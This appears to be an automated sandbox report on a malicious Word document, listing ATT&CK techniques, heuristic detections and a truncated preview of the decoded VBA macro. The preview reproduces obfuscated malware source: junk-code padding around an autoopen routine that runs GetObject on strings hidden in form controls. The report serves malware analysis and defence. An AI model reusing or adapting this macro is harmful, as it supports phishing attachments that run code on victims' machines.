MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1203 Exploitation for Client Execution
The file is identified as malicious by ClamAV and exhibits critical heuristic firings for VBA macros, including an AutoOpen macro and GetObject calls. The presence of VBA code suggests an attempt to execute arbitrary code, likely to download and run a secondary payload. The document's structure and macro execution point towards a spearphishing attachment delivery method.
Heuristics 7
-
ClamAV: Doc.Malware.00536d-6931473-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.00536d-6931473-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 28098 bytes |
SHA-256: 2cc12f600c5b55a0627bb62fe27a75bff9c13ac2884fc6204e21b392ab932a7c |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "qDAZBA"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "dQGAAXAx"
Attribute VB_Base = "0{831114E8-1BEE-475A-A30D-4E41E7BFB6FB}{9B3E3F9B-8D90-46EA-A146-D8006D2BE68B}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "OGAAZ1UD"
Attribute VB_Base = "0{E8350667-3B50-4C9F-B57A-8401A0B47C81}{1A50BD04-63DA-4257-B45D-193D975D982C}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "MDDkAC"
Function HAAkDGc()
If 234793173 = 955128722 Then
For sABD1xA = HAAQAAA_ To XBQQAA
LwXGAA _
= 590788580 / Rnd(awGAAXQU) + 686524228 * _
CStr(UxAoAoUC) * 69788149 - Oct(524980210 * _
Fix(857532658) / 459805826 + Int(kAG_BAXA)) _
- NAAUDx + 819909122 - 39922484 + 734924491 - (KZADAAAx - 350500046)
Next
End If
If 838535891 = 308542598 Then
For PAZAAA = sAAoXx To dXCc1cD
NoDkAA _
= 607585464 / Rnd(tk4AkC) + 591834109 * _
CStr(B_xBwZD) * 612392643 - Oct(662243143 * _
Fix(363155519) / 729679268 + Int(wBDUDx)) _
- cXAkAGA + 414496952 - 59547387 + 997231206 - (RA_wAAB - 31807346)
Next
End If
If 615641498 = 971733395 Then
For kAUAwAAC = vcDDAoA To zAGAU_Q
lZDBAQw _
= 415278270 / Rnd(IQAcBcQ) + 766547606 * _
CStr(aCQDDBDx) * 357129484 - Oct(986053300 * _
Fix(619173463) / 715053212 + Int(MAwABB)) _
- ioDAxADB + 931587625 - 682466297 + 575405209 - (oUxwBAwA - 239044724)
Next
End If
End Function
Sub autoopen()
k4CAUU
End Sub
Function k4CAUU()
On Error Resume Next
If 882376888 = 619571257 Then
For MA1wZA = AQAwoB To w_Gx1kQ_
IUBcCQk _
= 546731093 / Rnd(OZCAwXA4) + 284838484 * _
CStr(kwQAUC4A) * 126094876 - Oct(132822607 * _
Fix(804812243) / 208842423 + Int(VUAAwkAc)) _
- VZDAkDAX + 964357706 - 662064978 + 454073096 - (LQ4ZAA - 613485824)
Next
End If
If 989143074 = 878505632 Then
For iACXQoA = aAGUZ1 To OCQAAAAZ
HXBcDQ _
= 555217259 / Rnd(rXQQDD) + 286200540 * _
CStr(lxDUA4UA) * 90769262 - Oct(195948124 * _
Fix(927750395) / 922434016 + Int(cA1AZQAk)) _
- BGGAAXA + 366949174 - 253224676 + 73240808 - (CACCAA - 444338928)
Next
End If
Set EGXwoA = GetObject(dQGAAXAx.RBCAxDoB.ControlSource + OGAAZ1UD.IADBAA1x + dQGAAXAx.RBCAxDoB.ControlTipText)
If 404351976 = 864257624 Then
For OoUoQ_A = dBw1AQD To ZwXBZQ
fAQAkDA _
= 125456284 / Rnd(fA4GUA) + 251774005 * _
CStr(iDwAGAAD) * 847533478 - Oct(291762408 * _
Fix(723287923) / 377251810 + Int(uBUDXAXA)) _
- iQA_BZ + 878302991 - 307811842 + 659708720 - (NUcBDQ - 5511155)
Next
End If
If 366230231 = 23927789 Then
For DAAAXA = uUA4AkZ To I_UB4cG
nUDAAA _
= 460946474 / Rnd(kA_AQ1AA) + 88722666 * _
CStr(SQcGAw) * 563469152 - Oct(163245704 * _
Fix(437422444) / 464684878 + Int(qAcBAc)) _
- GA_QAxD + 939410207 - 415686895 + 580904789 - (L1AcAAcC - 341766125)
Next
End If
If 26668 = 26668 Then
If 558906053 = 756399120 Then
For n_xX1wQ = FAXAxU To iDAAkX
GkAo_Ac _
= 666216049 / Rnd(lAAwZQA4) + 315904366 * _
CStr(dAAZAcU) * 544001265 - Oct(531890353 * _
Fix(638258695) / 274411602 + Int(JkoAA1CQ)) _
- jDADoA + 318412963 - 520745769 + 859019735 - (cBAUAB4k - 329483975)
Next
End If
If 825427278 = 717707181 Then
For KAxAAQAQ = zA_DAoB To oDAUAD
cUCZD1B _
= 39107371 / Rnd(JABAckQA) + 792787418 * _
CStr(pAZAZQG) * 453410141 - Oct(487295443 * _
Fix(197935780) / 791546417 + Int(pUwA4A)) _
- LxDGUA + 104465988 - 621382070 + 891863162 - (RQAAAGo - 51098945
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.